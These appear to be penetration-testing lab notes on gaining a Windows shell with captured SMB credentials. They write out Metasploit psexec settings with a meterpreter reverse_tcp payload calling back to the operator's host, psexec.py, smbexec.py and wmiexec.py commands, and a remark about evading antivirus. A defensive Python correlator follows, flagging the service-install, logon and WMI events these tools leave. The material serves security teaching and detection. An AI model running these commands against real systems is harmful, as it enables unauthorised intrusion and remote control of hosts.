Gaining Shell Access
Once we use the hashes from SMB Relay or LLMNR Poisoning, we should have some creds we can use to gain shell access.
Spin up metasploit
# Start metasploit
msfconsole
# Use psexec exploit
search psexec
# Look for windows/smb/psexec
# Set options
set rhosts TARGET_IP
set smbdomain TARGET_DOMAIN
set smbpass USER_PASS
set smbuser TARGET_USER
set payload windows/x64/meterpreter/reverse_tcp
set lhost YOUR_IP
Another option is to use psexec.py
# Run psexec.py
psexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP
# Example
psexec.py marvel.local/fcastle:[email protected]

Other options
These are good to sneak around, get information, disable things like AV, etc.
smbexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP
wmiexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP
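
From the defender's side, the three approaches above tend to leave correlatable Windows events: a network logon (4624, logon type 3), a service install (7045) and, for WMI execution, process creation (4688). The following is an added example, not part of the original notes: a small correlator over constructed, simplified event records. The field names, the 60 second window and the three regex heuristics are assumptions based on the tools' commonly reported default behaviour.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed correlation window, tune per environment

# Heuristics (assumptions about default tool behaviour; an operator can change them)
SVC_IN_SYSTEMROOT = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", re.I)
SVC_VIA_SHELL = re.compile(r"(%comspec%|cmd\.exe)\s+/q\s+/c", re.I)
WMI_REDIRECT = re.compile(r"cmd\.exe\s+/q\s+/c .*\\\\127\.0\.0\.1\\admin\$\\", re.I)

def detect(events):
    """Return (host, reason, source_ip) for each suspicious event, in time order."""
    findings, last_logon = [], {}  # host -> (time, src_ip) of latest type 3 logon
    for ev in sorted(events, key=lambda e: e["time"]):
        host, eid = ev["host"], ev["id"]
        if eid == 4624 and ev.get("logon_type") == 3:   # network logon
            last_logon[host] = (ev["time"], ev.get("src_ip"))
        elif eid == 7045:                                # service installed
            seen = last_logon.get(host)
            if not seen or ev["time"] - seen[0] > WINDOW:
                continue  # no recent network logon to tie the install to
            path = ev.get("image_path", "")
            if SVC_IN_SYSTEMROOT.search(path):
                findings.append((host, "service binary directly in SystemRoot", seen[1]))
            elif SVC_VIA_SHELL.search(path):
                findings.append((host, "service runs a shell one-liner", seen[1]))
        elif eid == 4688:                                # process creation
            if (ev.get("parent", "").lower().endswith("wmiprvse.exe")
                    and WMI_REDIRECT.search(ev.get("cmdline", ""))):
                findings.append((host, "WMI-spawned cmd.exe writing to ADMIN$", None))
    return findings

# Constructed sample events (simplified field names, not a real log export)
T0 = datetime(2024, 1, 1, 9, 0, 0)
SAMPLE = [
    {"time": T0, "host": "WS01", "id": 4624, "logon_type": 3, "src_ip": "192.0.2.10"},
    {"time": T0 + timedelta(seconds=2), "host": "WS01", "id": 7045,
     "image_path": r"%SystemRoot%\kQxZbTnA.exe"},
    {"time": T0 + timedelta(seconds=5), "host": "WS02", "id": 7045,
     "image_path": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"time": T0 + timedelta(minutes=5), "host": "WS03", "id": 4624, "logon_type": 3,
     "src_ip": "192.0.2.10"},
    {"time": T0 + timedelta(minutes=5, seconds=1), "host": "WS03", "id": 7045,
     "image_path": r"%COMSPEC% /Q /c echo whoami ^> out.txt"},
    {"time": T0 + timedelta(minutes=9), "host": "WS04", "id": 4688,
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000 2>&1"},
]
```

The 4688 rule only works where command-line auditing for process creation is enabled, and the service-path patterns should be baselined against legitimate remote-admin tooling before alerting on them.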